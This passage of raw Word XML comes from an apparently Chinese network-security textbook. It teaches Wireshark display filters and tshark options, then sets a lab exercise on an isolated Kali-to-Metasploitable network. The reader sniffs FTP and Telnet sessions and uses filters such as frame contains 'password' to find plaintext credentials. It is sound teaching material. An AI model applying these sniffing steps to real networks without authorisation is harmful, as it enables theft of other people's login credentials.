      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时）：邮件凭据和内容均明文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常用显示过滤表达式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">掌握过滤表达式是高效分析的关键。以下为典型场景（①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准语法）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip.addr == 192.168.1.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（源或目的）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eth.addr == aa:bb:cc:dd:ee:ff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.port == 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request.method == "GET"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索敏感关键词（在包内容中）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">frame contains "password"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp contains "USER"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">找出所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重传：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.analysis.retransmission</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. tshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的命令行版本，适用于远程服务器、自动化脚本以及无图形界面的环境。常用参数：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-i &lt;interface&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定接口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-f "&lt;capture filter&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">捕获过滤器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-Y "&lt;display filter&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取文件时应用显示过滤器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-w &lt;file.pcap&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写入文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-r &lt;file.pcap&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-T fields -e &lt;field&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取指定字段（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-T fields -e ip.src -e tcp.srcport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于图形界面能够更直观地展示协议层次和流重组，初学者通常从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开始，但在自动化数据提取中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可或缺。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：按照第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章搭建的隔离实验网络，包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机（或装有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机（IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;METASPLOITABLE_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，实际值因环境而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。两台主机必须在同一二层广播域（同一交换机或虚拟网络），且与生产网络隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">抓包与基础过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，因为抓包需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限），选择通向靶机的网卡接口。开始抓包后，从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向靶机发起一些明文服务请求以产生流量，例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">METASPLOITABLE_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 输入匿名登录或已知用户名/密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">METASPLOITABLE_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的显示过滤栏中逐步输入：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.port == 23</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等效于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">找到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制连接的一个包，右键选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Follow TCP Stream”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，你会看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">USER &lt;username&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS &lt;password&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以红色和蓝色显示的对话。此处的凭据取决于靶机的实际配置，请读者自行观察，本书不编造具体值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②。同样的方法追踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话，可以看到登录提示和输入的用户名/密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在未使用加密的情况下，FTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制流中明文出现登录凭据，数据流中明文传输文件内容。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流完全透明，每个击键可见，登录过程清晰。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若仅进行一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，可以看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回显请求与回复。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤表达式将无关流量隐藏，让分析聚焦。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Permission denied”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
